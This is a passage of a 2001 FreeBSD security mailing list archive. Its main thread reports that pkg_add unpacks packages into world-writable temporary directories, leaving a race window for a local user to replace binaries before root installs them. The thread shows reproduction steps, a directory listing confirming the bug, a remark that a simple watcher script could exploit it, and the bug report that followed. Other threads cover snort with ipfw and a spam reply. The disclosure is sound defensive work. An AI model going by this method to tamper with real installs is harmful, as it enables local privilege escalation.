owner-freebsd-security Wed Nov 21 11:41:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts11-srv.bellnexxia.net (tomts11.bellnexxia.net [209.226.175.55]) by hub.freebsd.org (Postfix) with ESMTP id 6E61637B43F for ; Wed, 21 Nov 2001 11:40:25 -0800 (PST) Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts11-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121194024.PUEQ24249.tomts11-srv.bellnexxia.net@khan.anarcat.dyndns.org>; Wed, 21 Nov 2001 14:40:24 -0500 Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id E2C481A4F; Wed, 21 Nov 2001 14:41:37 -0500 (EST) Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 953F120ADB; Wed, 21 Nov 2001 14:42:00 -0500 (EST) Date: Wed, 21 Nov 2001 14:41:59 -0500 From: The Anarcat To: Eric Anderson Cc: FreeBSD Security Issues Subject: Re: fun with pkg_add Message-ID: <20011121194159.GA69296@shall.anarcat.dyndns.org> Mail-Followup-To: Eric Anderson , FreeBSD Security Issues References: <20011121191808.GD44370@shall.anarcat.dyndns.org> <3BFC025D.36710154@centtech.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="fdj2RfSjLxBAspz7" Content-Disposition: inline In-Reply-To: <3BFC025D.36710154@centtech.com> User-Agent: Mutt/1.3.23.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --fdj2RfSjLxBAspz7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed Nov 21, 2001 at 01:37:01PM -0600, Eric Anderson wrote: > The only danger I see is a potential that the user could > replace the binary with a hacked version, between untaring > and installing, creating a breach.=20 Yes. This is what I saw too. > Other than that, it's the same as a /var/tmp directory almost.=20 Except that /var/tmp is a "known issue" and admins are generally aware of its vulnurability. Admins surely don't expect their installed packages to be overwritable. I will open a pr about this. A. --fdj2RfSjLxBAspz7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv8A4UACgkQttcWHAnWiGd2aQCdHzckZUYreDSKVtaVl/hkfWWe ZTsAnROAnjek6mBgldouNttfjTbWBjAC =g30E -----END PGP SIGNATURE----- --fdj2RfSjLxBAspz7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:41:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from lazir.toya.net.pl (lazir.toya.net.pl [217.113.224.3]) by hub.freebsd.org (Postfix) with SMTP id CD90237B449 for ; Wed, 21 Nov 2001 11:41:23 -0800 (PST) Received: (qmail 28231 invoked by uid 791); 21 Nov 2001 19:38:06 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 Nov 2001 19:38:06 -0000 Date: Wed, 21 Nov 2001 20:38:06 +0100 (CET) From: To: The Anarcat Cc: FreeBSD Security Issues Subject: Re: fun with pkg_add In-Reply-To: <20011121191808.GD44370@shall.anarcat.dyndns.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 21 Nov 2001, The Anarcat wrote: > Hi! > > I just noticed something that could be a problem with pkg_add > algorithms. When it installs a package, it first untars it in a > temporary directory. The problem is that the subdirectories of the > package created this way are world-writable: > > $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.tgz > $ pkg_add auctex-10.0g.tgz > ^Z ^Z is SIGTSTP it susspend prcoesses, there is a very small posibilty that our 'attacker' will change somthing when you are installing package. ;-) I didn`t check the /var/tmp/inst* directory permissions, but i guess it`s imposible to exploit this security issue. Regards. airot... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:45:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts11-srv.bellnexxia.net (tomts11.bellnexxia.net [209.226.175.55]) by hub.freebsd.org (Postfix) with ESMTP id 433E037B416 for ; Wed, 21 Nov 2001 11:45:01 -0800 (PST) Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts11-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121194500.PXQH24249.tomts11-srv.bellnexxia.net@khan.anarcat.dyndns.org>; Wed, 21 Nov 2001 14:45:00 -0500 Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id 1688118D3; Wed, 21 Nov 2001 14:46:12 -0500 (EST) Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 15C8720ADB; Wed, 21 Nov 2001 14:46:35 -0500 (EST) Date: Wed, 21 Nov 2001 14:46:34 -0500 From: The Anarcat To: airot@lazir.toya.net.pl Cc: FreeBSD Security Issues Subject: Re: fun with pkg_add Message-ID: <20011121194634.GB69296@shall.anarcat.dyndns.org> Mail-Followup-To: airot@lazir.toya.net.pl, FreeBSD Security Issues References: <20011121191808.GD44370@shall.anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="0eh6TmSyL6TZE2Uz" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.23.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --0eh6TmSyL6TZE2Uz Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed Nov 21, 2001 at 08:38:06PM +0100, airot@lazir.toya.net.pl wrote: >=20 >=20 > On Wed, 21 Nov 2001, The Anarcat wrote: >=20 > > Hi! > > > > I just noticed something that could be a problem with pkg_add > > algorithms. When it installs a package, it first untars it in a > > temporary directory. The problem is that the subdirectories of the > > package created this way are world-writable: > > > > $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10= .0g.tgz > > $ pkg_add auctex-10.0g.tgz > > ^Z > ^Z is SIGTSTP it susspend prcoesses, there is a very small posibilty that > our 'attacker' will change somthing when you are installing package. ;-) Wrong. With large packages such as XFree86, the untarring actually takes a few minutes, sometimes, and thus leave a large window of attack. > I didn`t check the /var/tmp/inst* directory permissions, but i guess it`s > imposible to exploit this security issue. Again, I do not agree, as I have exploited this security issue. It might be related to some misconfiguration on my side (but I doubt it), and it is why I sent this to the list first, to get some confirmation of the bug. A. --0eh6TmSyL6TZE2Uz Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv8BJkACgkQttcWHAnWiGeaowCeLHroQl3psl6x45uuAglEXYR+ JHAAn3O8j4WknM7fw4/p9e8Zw4KYAjhb =vcth -----END PGP SIGNATURE----- --0eh6TmSyL6TZE2Uz-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:50:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 84D2437B417 for ; Wed, 21 Nov 2001 11:50:44 -0800 (PST) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id fALJoX401630; Wed, 21 Nov 2001 13:50:33 -0600 (CST) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id NAA15049; Wed, 21 Nov 2001 13:50:33 -0600 (CST) Message-ID: <3BFC057D.49A7AE1B@centtech.com> Date: Wed, 21 Nov 2001 13:50:21 -0600 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: The Anarcat Cc: airot@lazir.toya.net.pl, FreeBSD Security Issues Subject: Re: fun with pkg_add References: <20011121191808.GD44370@shall.anarcat.dyndns.org> <20011121194634.GB69296@shall.anarcat.dyndns.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It would be very trivial to write a script that watched every second for a new package install, overwriting the executable binaries with hacked scripts or other binaries, without an attacker even paying attention.. 15 minutes with perl and you have your exploit. Eric The Anarcat wrote: > > On Wed Nov 21, 2001 at 08:38:06PM +0100, airot@lazir.toya.net.pl wrote: > > > > > > On Wed, 21 Nov 2001, The Anarcat wrote: > > > > > Hi! > > > > > > I just noticed something that could be a problem with pkg_add > > > algorithms. When it installs a package, it first untars it in a > > > temporary directory. The problem is that the subdirectories of the > > > package created this way are world-writable: > > > > > > $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.tgz > > > $ pkg_add auctex-10.0g.tgz > > > ^Z > > ^Z is SIGTSTP it susspend prcoesses, there is a very small posibilty that > > our 'attacker' will change somthing when you are installing package. ;-) > > Wrong. With large packages such as XFree86, the untarring actually takes > a few minutes, sometimes, and thus leave a large window of attack. > > > I didn`t check the /var/tmp/inst* directory permissions, but i guess it`s > > imposible to exploit this security issue. > > Again, I do not agree, as I have exploited this security issue. > > It might be related to some misconfiguration on my side (but I doubt > it), and it is why I sent this to the list first, to get some > confirmation of the bug. > > A. > > ------------------------------------------------------------ > Part 1.2Type: application/pgp-signature -- ------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology An unbreakable toy is useful for breaking other toys. ------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:55:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 02DDA37B416 for ; Wed, 21 Nov 2001 11:55:21 -0800 (PST) Received: (qmail 18175 invoked by uid 1000); 21 Nov 2001 19:55:19 -0000 Date: Wed, 21 Nov 2001 20:55:19 +0100 From: Bart Matthaei To: The Anarcat Cc: security@freebsd.org Subject: Re: fun with pkg_add Message-ID: <20011121205519.A16928@heresy.dreamflow.nl> References: <20011121191808.GD44370@shall.anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="9jxsPFA5p3P2qPhR" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011121191808.GD44370@shall.anarcat.dyndns.org>; from anarcat@anarcat.dyndns.org on Wed, Nov 21, 2001 at 02:18:08PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --9jxsPFA5p3P2qPhR Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Nov 21, 2001 at 02:18:08PM -0500, The Anarcat wrote: [snip] 20 bart@heresy tmp 20:50 # pkg_add ~bart/fasta3-33.t08.d4.tgz ^Z Suspended 21 bart@heresy tmp 20:50 # ls instmp.GUTUuC vi.recover 22 bart@heresy tmp 20:50 # ls -l total 2 drwxr-xr-x 6 root wheel 512 Nov 21 20:50 instmp.GUTUuC drwxrwxrwt 2 root wheel 512 Nov 21 19:59 vi.recover 23 bart@heresy tmp 20:51 # ls -l instmp.GUTUuC/ total 17 -rw-r--r-- 1 root wheel 69 Nov 12 20:10 +COMMENT -rw-r--r-- 1 root wheel 4127 Nov 12 20:10 +CONTENTS -rw-r--r-- 1 root wheel 971 Nov 12 20:10 +DESC -r--r--r-- 1 root wheel 5181 Nov 12 20:10 +MTREE_DIRS drwxrwxrwx 2 root wheel 512 Nov 21 20:50 bin drwxrwxrwx 2 root wheel 512 Nov 21 20:50 etc drwxrwxrwx 3 root wheel 512 Nov 21 20:50 man drwxrwxrwx 3 root wheel 512 Nov 21 20:50 share Confirmed on FreeBSD 4.4-RELEASE FreeBSD heresy.dreamflow.nl 4.4-RELEASE FreeBSD 4.4-RELEASE #9: Thu Nov 15 12:36:09 CET 2001 Rgds, B. p.s. i have no clue what fasta is ;) (just grabbed a random gz), so dont flame me for installing barbie doll simulators or something :) -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. You just live in it */ --9jxsPFA5p3P2qPhR Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7/Aangcc6pR+tCegRAnyhAKCcvx0lRHoi44h52jP5b6xMaKq+AQCg1v5D ELxMUCHfjdbevUwgclj3aXM= =CL+w -----END PGP SIGNATURE----- --9jxsPFA5p3P2qPhR-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 12: 3:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139]) by hub.freebsd.org (Postfix) with ESMTP id 7DDCB37B416 for ; Wed, 21 Nov 2001 12:03:10 -0800 (PST) Received: from trantor.xs4all.nl (trantor.xs4all.nl [194.109.61.248]) by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with ESMTP id fALK2xiJ081737 for ; Wed, 21 Nov 2001 21:03:01 +0100 (CET) Received: from trantor.xs4all.nl (localhost [127.0.0.1]) by trantor.xs4all.nl (8.11.6/8.9.3) with ESMTP id fALK2vV20500 for ; Wed, 21 Nov 2001 21:02:58 +0100 (MET) (envelope-from paulz@trantor.xs4all.nl) Message-Id: <200111212002.fALK2vV20500@trantor.xs4all.nl> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: security@FreeBSD.ORG Subject: ipfw and snort Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 21 Nov 2001 21:02:57 +0100 From: Paul van der Zwan Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I would like to run snort on my ppp link to my ISP to see what people are trying, but I also have a set of ipfw rules to allow only the traffic I want to allow. Is there a way to have those rules in place but still have snort see all incoming packets including those running into the deny rules ?? Paul -- Paul van der Zwan paulz @ trantor.xs4all.nl "I think I'll move to theory, everything works in theory..." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 12: 8:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from lazir.toya.net.pl (lazir.toya.net.pl [217.113.224.3]) by hub.freebsd.org (Postfix) with SMTP id CCE3637B416 for ; Wed, 21 Nov 2001 12:08:53 -0800 (PST) Received: (qmail 28956 invoked by uid 791); 21 Nov 2001 20:05:41 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 Nov 2001 20:05:41 -0000 Date: Wed, 21 Nov 2001 21:05:41 +0100 (CET) From: To: Bart Matthaei Cc: The Anarcat , Subject: Re: fun with pkg_add In-Reply-To: <20011121205519.A16928@heresy.dreamflow.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well the problem exists, it should have 700 permissions. The only problem is time, and you dont know what kind of package is beeing installed right now so exploiting is reather easy but problematical. Regards. airot.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 12:13:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from I-Sphere.COM (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id 0413537B405 for ; Wed, 21 Nov 2001 12:13:37 -0800 (PST) Received: (from fasty@localhost) by I-Sphere.COM (8.11.6/8.11.6) id fALKDdS30442; Wed, 21 Nov 2001 12:13:39 -0800 (PST) (envelope-from fasty) Date: Wed, 21 Nov 2001 12:13:39 -0800 From: faSty To: Paul van der Zwan Cc: freebsd-security@freebsd.org Subject: Re: ipfw and snort Message-ID: <20011121121339.B30001@i-sphere.com> References: <200111212002.fALK2vV20500@trantor.xs4all.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200111212002.fALK2vV20500@trantor.xs4all.nl>; from paulz@trantor.xs4all.nl on Wed, Nov 21, 2001 at 09:02:57PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I recommend grab Guardian v2.6.3 for snort. It's very excellent protection timer unblock. They support FreeBSD too. URL: http://www.chaotic.org/guardian/ this guardian work beautiful control the attackers with 64000 IPs attacked my server last week. -trev On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote: > > I would like to run snort on my ppp link to my ISP to see what people are > trying, but I also have a set of ipfw rules to allow only the traffic I > want to allow. > Is there a way to have those rules in place but still have snort see all > incoming packets including those running into the deny rules ?? > > Paul > > -- > Paul van der Zwan paulz @ trantor.xs4all.nl > "I think I'll move to theory, everything works in theory..." > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- All this wheeling and dealing around, why, it isn't for money, it's for fun. Money's just the way we keep score. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 12:14: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts12-srv.bellnexxia.net (tomts12.bellnexxia.net [209.226.175.56]) by hub.freebsd.org (Postfix) with ESMTP id F290337B418 for ; Wed, 21 Nov 2001 12:13:53 -0800 (PST) Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts12-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121201353.UPNQ7758.tomts12-srv.bellnexxia.net@khan.anarcat.dyndns.org>; Wed, 21 Nov 2001 15:13:53 -0500 Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id 4E4D01A38; Wed, 21 Nov 2001 15:15:03 -0500 (EST) Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 25A4720ADB; Wed, 21 Nov 2001 15:15:25 -0500 (EST) Date: Wed, 21 Nov 2001 15:15:25 -0500 From: The Anarcat To: Eric Anderson Cc: FreeBSD Security Issues Subject: Re: fun with pkg_add Message-ID: <20011121201525.GC69296@shall.anarcat.dyndns.org> Mail-Followup-To: Eric Anderson , FreeBSD Security Issues References: <20011121191808.GD44370@shall.anarcat.dyndns.org> <3BFC025D.36710154@centtech.com> <20011121194159.GA69296@shall.anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="s9fJI615cBHmzTOP" Content-Disposition: inline In-Reply-To: <20011121194159.GA69296@shall.anarcat.dyndns.org> User-Agent: Mutt/1.3.23.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --s9fJI615cBHmzTOP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed Nov 21, 2001 at 02:41:59PM -0500, The Anarcat wrote: >=20 > I will open a pr about this. bin/32172: pkg_add creates its temporary directories world writable A. --s9fJI615cBHmzTOP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv8C1wACgkQttcWHAnWiGdqSwCgoi1C7d1NFPE9aIOxiF9uztNM kmMAnjFZ7ViT8x5B1Hhh1nDMXGRaGEAW =allH -----END PGP SIGNATURE----- --s9fJI615cBHmzTOP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 12:48: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from atkielski.com (atkielski.com [161.58.232.69]) by hub.freebsd.org (Postfix) with ESMTP id 813B637B417 for ; Wed, 21 Nov 2001 12:47:57 -0800 (PST) Received: from contactdish (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by atkielski.com (8.11.6) id fALKltH74163; Wed, 21 Nov 2001 21:47:56 +0100 (CET) Message-ID: <00dc01c172cd$cc535500$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "freebsd-security@freebsd.org" References: <200111211551.KAA17753@spider10.spiderwebhost.net> Subject: Re: New Dental Practice Philosophy Date: Wed, 21 Nov 2001 21:47:30 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I can just imagine the command now: root# canal -visits 2 -cost 1200 -crown yes ----- Original Message ----- From: "Steven M. Seltzer" To: "freebsd-security@freebsd.org" Sent: Wednesday, November 21, 2001 16:51 Subject: New Dental Practice Philosophy Hi, I would like to wish you a very Happy Thanksgiving! We recently created a one page practice philosophy statement that emphasizes teamwork, caring, helping others, and developing your full potential by assuming a more active role in the practice. This philosophy is designed specifically for updating skills in the practice to utilize technology tools that improve productivity and efficiency. If you would like to receive this philosophy statement with my compliments, please reply to this e-mail with your name, address, and e-mail address where you would like the philosophy sent. If you prefer not to receive future technology and practice management updates like this one, please reply to this message and type, "remove" in the subject line. Thank you. Best regards, Steve Seltzer www.hitecdentist.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 12:55:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 64C1C37B417 for ; Wed, 21 Nov 2001 12:55:23 -0800 (PST) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 8ED1666B0F; Wed, 21 Nov 2001 12:55:22 -0800 (PST) Date: Wed, 21 Nov 2001 12:55:22 -0800 From: Kris Kennaway To: Paul van der Zwan Cc: security@FreeBSD.ORG Subject: Re: ipfw and snort Message-ID: <20011121125522.A17380@xor.obsecurity.org> References: <200111212002.fALK2vV20500@trantor.xs4all.nl> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7AUc2qLy4jB3hD7Z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200111212002.fALK2vV20500@trantor.xs4all.nl>; from paulz@trantor.xs4all.nl on Wed, Nov 21, 2001 at 09:02:57PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --7AUc2qLy4jB3hD7Z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote: >=20 > I would like to run snort on my ppp link to my ISP to see what people are > trying, but I also have a set of ipfw rules to allow only the traffic I > want to allow. > Is there a way to have those rules in place but still have snort see all= =20 > incoming packets including those running into the deny rules ?? Yes, this is how it works always. Kris --7AUc2qLy4jB3hD7Z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7/BS5Wry0BWjoQKURAsIHAJ0dCARZVWb+l0bwd+4af+sQ9tisigCfSNiF lwoSmo2fjcVA2bO+8KUTlCA= =/Usk -----END PGP SIGNATURE----- --7AUc2qLy4jB3hD7Z-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 13:26:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139]) by hub.freebsd.org (Postfix) with ESMTP id EF12937B416 for ; Wed, 21 Nov 2001 13:26:22 -0800 (PST) Received: from trantor.xs4all.nl (trantor.xs4all.nl [194.109.61.248]) by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with ESMTP id fALLQFhd003105; Wed, 21 Nov 2001 22:26:16 +0100 (CET) Received: from trantor.xs4all.nl (localhost [127.0.0.1]) by trantor.xs4all.nl (8.11.6/8.9.3) with ESMTP id fALLQE606054; Wed, 21 Nov 2001 22:26:14 +0100 (MET) (envelope-from paulz@trantor.xs4all.nl) Message-Id: <200111212126.fALLQE606054@trantor.xs4all.nl> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: Kris Kennaway Cc: Paul van der Zwan , security@FreeBSD.ORG, paulz@trantor.xs4all.nl Subject: Re: ipfw and snort In-Reply-To: Message from Kris Kennaway of "Wed, 21 Nov 2001 12:55:22 PST." <20011121125522.A17380@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 21 Nov 2001 22:26:14 +0100 From: Paul van der Zwan Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote: > > > > I would like to run snort on my ppp link to my ISP to see what people are > > trying, but I also have a set of ipfw rules to allow only the traffic I > > want to allow. > > Is there a way to have those rules in place but still have snort see all > > incoming packets including those running into the deny rules ?? > > Yes, this is how it works always. I did some testing using ethereal and when I try an incoming telnet (which is denied by ipwf) I don't see any packets arriving ( or ICMP going). This make me suspect that bpf processing takes place after ipfw.. Paul -- Paul van der Zwan paulz @ trantor.xs4all.nl "I think I'll move to theory, everything works in theory..." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 13:37:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 0458237B405 for ; Wed, 21 Nov 2001 13:37:18 -0800 (PST) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 937A866B0F; Wed, 21 Nov 2001 13:37:17 -0800 (PST) Date: Wed, 21 Nov 2001 13:37:17 -0800 From: Kris Kennaway To: Paul van der Zwan Cc: Kris Kennaway , security@FreeBSD.ORG Subject: Re: ipfw and snort Message-ID: <20011121133717.A22787@xor.obsecurity.org> References: <200111212126.fALLQE606054@trantor.xs4all.nl> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Q68bSM7Ycu6FN28Q" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200111212126.fALLQE606054@trantor.xs4all.nl>; from paulz@trantor.xs4all.nl on Wed, Nov 21, 2001 at 10:26:14PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Q68bSM7Ycu6FN28Q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 21, 2001 at 10:26:14PM +0100, Paul van der Zwan wrote: > > On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote: > > >=20 > > > I would like to run snort on my ppp link to my ISP to see what people= are > > > trying, but I also have a set of ipfw rules to allow only the traffic= I > > > want to allow. > > > Is there a way to have those rules in place but still have snort see = all=20 > > > incoming packets including those running into the deny rules ?? > >=20 > > Yes, this is how it works always. >=20 > I did some testing using ethereal and when I try an incoming telnet (whic= h=20 > is denied by ipwf) I don't see any packets arriving ( or ICMP going). > This make me suspect that bpf processing takes place after ipfw.. No, it does 